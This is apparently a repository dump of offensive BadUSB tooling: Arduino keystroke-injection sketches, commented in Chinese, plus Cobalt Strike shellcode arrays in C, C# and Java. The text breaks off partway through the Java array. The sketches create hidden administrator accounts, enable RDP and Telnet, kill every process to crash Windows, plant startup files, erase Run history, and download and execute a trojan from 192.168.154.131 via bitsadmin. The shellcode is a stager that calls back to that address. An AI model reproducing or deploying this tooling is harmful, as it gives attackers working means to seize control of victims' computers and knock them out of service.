[
  {
    "path": "AddUser_StartService/AddUser_Enable3389(tools).ino",
    "content": "void setup(){\n  Keyboard.begin();\n  delay(3000);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.println(\"POWERSHELL.EXE -C START-PROCESS POWERSHELL -VERB RUNAS\");\n  Keyboard.println();\n  delay(1000);\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('y');\n  Keyboard.release(KEY_LEFT_ALT);\n  delay(500);\n  Keyboard.println(\"CMD\");\n  delay(50);\n  Keyboard.println(\"CMD /C NET USER ADMIN ADMIN /ADD&NET LOCALGROUP ADMINISTRATORS ADMIN /ADD\");\n  delay(50)\n  Keyboard.println(\"ECHO wINDOWS rEGISTRY eDITOR vERSION 5.00>3389.REG&&ECHO [hkey_local_machine\\\\system\\\\cURRENTcONTROLsET\\\\cONTROL\\\\tERMINAL sERVER]>>3389.REG&&ECHO \\\"FdENYtscCONNECTIONS\\\"=DWORD:00000000>>3389.REG&&ECHO [hkey_local_machine\\\\system\\\\cURRENTcONTROLsET\\\\cONTROL\\\\tERMINAL sERVER\\\\wDS\\\\RDPWD\\\\tDS\\\\TCP]>>3389.REG&&ECHO \\\"pORTnUMBER\\\"=DWORD:00000D3D>>3389.REG&&ECHO [hkey_local_machine\\\\system\\\\cURRENTcONTROLsET\\\\cONTROL\\\\tERMINAL sERVER\\\\wINsTATIONS\\\\rdp-tCP]>>3389.REG&&ECHO \\\"pORTnUMBER\\\"=DWORD:00000D3D>>3389.REG\");\n  delay(100);\n  Keyboard.println(\"REGEDIT /S 3389.REG&&DEL 3389.REG&&EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\n\nvoid loop(){\n}\n"
  },
  {
    "path": "AddUser_StartService/AddUser_EnableFTP(tools).ino",
    "content": "void setup() {\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500);\n  Keyboard.println(\"CMD\");\n  Keyboard.println();\n  delay(500);\n  Keyboard.println(\"COLOR A&&CLS\");\n  Keyboard.println(\"NET USER 123 123 /ADD\");\n  delay(500);\n  Keyboard.println(\"NET LOCALGROUP ADMINISTRATORS 123 /ADD&&REG ADD \\\"hkey_local_machine\\\\software\\\\mICROSOFT\\\\wINDOWS nt\\\\cURRENTvERSION\\\\wINLOGON\\\\sPECIALaCCOUNTS\\\\uSERlIST\\\" /V 123 /D 0 /T reg_dword /F&&REG ADD \\\"hkey_local_machine\\\\software\\\\microsoft\\\\tELNETsERVER\\\\1.0\\\" /V ntlm /D 0 /T reg_doword/f&&reg add \\\"hklm\\\\system\\\\cURRENTcONTROLsET\\\\cONTRAL\\\\lSA\\\" /V \\\"FORCEGUEST\\\" /T reg_dword /D 0 /F\");\n  delay(1000);\n  Keyboard.println(\"SC CONFIG TLNTSVR START= AUTO\");\n  delay(500);\n  Keyboard.println(\"NET START TELNET\");\n  delay(500);\n  Keyboard.println(\"CLS&&ECHO hACKED fINISH\");\n    Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\nvoid loop() {\n}\n"
  },
  {
    "path": "BlueScreen/BlueScreen1(DOS).ino",
    "content": "//CMD蓝屏代码\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1&reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f&cmd /c for /f %I in ('wmic process get Name')do (wmic process where Name=\\\"%I\\\" delete)\");\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "BlueScreen/BlueScreen2(DOS).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(20000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"POWERSHELL -NOP -W HIDDEN -C \\\"sTART-pROCESS -fILEpATH CMD.EXE \\' /C FOR /F %i IN(''WMIC PROCESS GET nAME\\'\\')DO (WMIC PROCESS WHERE nAME=\\\"%i\\\" DELETE)\\' -vERB RUNAS\\\"\");\n  Keyboard.println();\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n  //bypass uac   绕过UAC 这一段不会用的不要用,否则后果自负\n  //Keyboard.press(KEY_LEFT_ALT);\n  //Keyboard.print('y');\n  //Keyboard.release(KEY_LEFT_ALT);\n}\n"
  },
  {
    "path": "BlueScreen/BlueScreen3(DOS).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n   Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.println(\"CMD /C FOR /F %i IN ('WMIC PROCESS GET nAME')DO (WMIC PROCESS WHERE nAME=\\\"%i\\\" DELETE)\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "BlueScreen/BlueScreen_xp_win7(DOS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() \n{\n  //初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /C START /MIN CMD /C REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "BlueScreen/DelayedBlueScreen (DOS).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd.exe /k reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\");\n  delay(500);\n  Keyboard.println(\"echo.if \\\"%1\\\" == \\\"h\\\" goto begin>c:\\\\1.bat&echo.mshta vbscript:createobject(\\\"wscript.shell\\\").run(\\\"%~nx0 h\\\",0)(window.close)^&^&exit>>c:\\\\1.bat&echo.:begin>>c:\\\\1.bat&echo.ping ^-n 3 127.1^>nul^&for /f %%I in ('wmic process get Name')do (wmic process where Name=\\\"%%I\\\" delete)^>c:\\\\1.vbs^&c:\\\\1.vbs>>c:\\\\1.bat&exit\");\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"c:\\\\1.bat\");\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "BlueScreen/RegistryWriteBlueScreen (DOS).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /C CD %USERPROFILE%\\\\aPPdATA\\\\rOAMING\\\\mICROSOFT\\\\wINDOWS\\\\sTART mENU\\\\pROGRAMS\\\\sTARTUP&ECHO FOR /F %%i IN (\\'WMIC PROCESS GET NAME\\')DO (WMIC PROCESS WHERE nAME=\\\"%%I\\\" DELETE)>SYSTEM.BAT&SHUTDOWN -R -F -T 0\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "BlueScreen/RegistryWriteBlueScreenGeneralUse (DOS).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /C START /MIN CMD /C REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n\n\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/Bitsadmin_TrojanExecution (LinkageWithCS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"cmd.exe /c bitsadmin /transfer 270c http://192.168.154.131:80/b %APPDATA%\\270c.exe&%APPDATA%\\270c.exe&del %APPDATA%\\270c.exe\");  //访问Web Delivery-bitsadmin，恶意网址按照实际更改\n  delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.c",
    "content": "/* length: 800 bytes */\nunsigned char buf[] = \"\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x6e\\x65\\x74\\x00\\x68\\x77\\x69\\x6e\\x69\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\x31\\xff\\x57\\x57\\x57\\x57\\x57\\x68\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xe9\\x84\\x00\\x00\\x00\\x5b\\x31\\xc9\\x51\\x51\\x6a\\x03\\x51\\x51\\x68\\x24\\x05\\x00\\x00\\x53\\x50\\x68\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x70\\x5b\\x31\\xd2\\x52\\x68\\x00\\x02\\x60\\x84\\x52\\x52\\x52\\x53\\x52\\x50\\x68\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x89\\xc6\\x83\\xc3\\x50\\x31\\xff\\x57\\x57\\x6a\\xff\\x53\\x56\\x68\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x84\\xc3\\x01\\x00\\x00\\x31\\xff\\x85\\xf6\\x74\\x04\\x89\\xf9\\xeb\\x09\\x68\\xaa\\xc5\\xe2\\x5d\\xff\\xd5\\x89\\xc1\\x68\\x45\\x21\\x5e\\x31\\xff\\xd5\\x31\\xff\\x57\\x6a\\x07\\x51\\x56\\x50\\x68\\xb7\\x57\\xe0\\x0b\\xff\\xd5\\xbf\\x00\\x2f\\x00\\x00\\x39\\xc7\\x74\\xb7\\x31\\xff\\xe9\\x91\\x01\\x00\\x00\\xe9\\xc9\\x01\\x00\\x00\\xe8\\x8b\\xff\\xff\\xff\\x2f\\x77\\x4c\\x61\\x38\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x31\\x30\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x36\\x2e\\x32\\x3b\\x20\\x57\\x69\\x6e\\x36\\x34\\x3b\\x20\\x78\\x36\\x34\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x36\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x00\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x68\\x00\\x00\\x40\\x00\\x57\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\xb9\\x00\\x00\\x00\\x00\\x01\\xd9\\x51\\x53\\x89\\xe7\\x57\\x68\\x00\\x20\\x00\\x00\\x53\\x56\\x68\\x12\\x96\\x89\\xe2\\xff\\xd5\\x85\\xc0\\x74\\xc6\\x8b\\x07\\x01\\xc3\\x85\\xc0\\x75\\xe5\\x58\\xc3\\xe8\\xa9\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x35\\x34\\x2e\\x31\\x33\\x31\\x00\\x00\\x00\\x00\\x00\";\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.cs",
    "content": "/* length: 800 bytes */\nbyte[] buf = new byte[800] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x24, 0x05, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x74, 0x4f, 0x57, 0x42, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x32, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x36, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x35, 0x34, 0x2e, 0x31, 0x33, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00 };\n"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.java",
    "content": "/* length: 800 bytes */\nbyte buf[] = new byte[] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 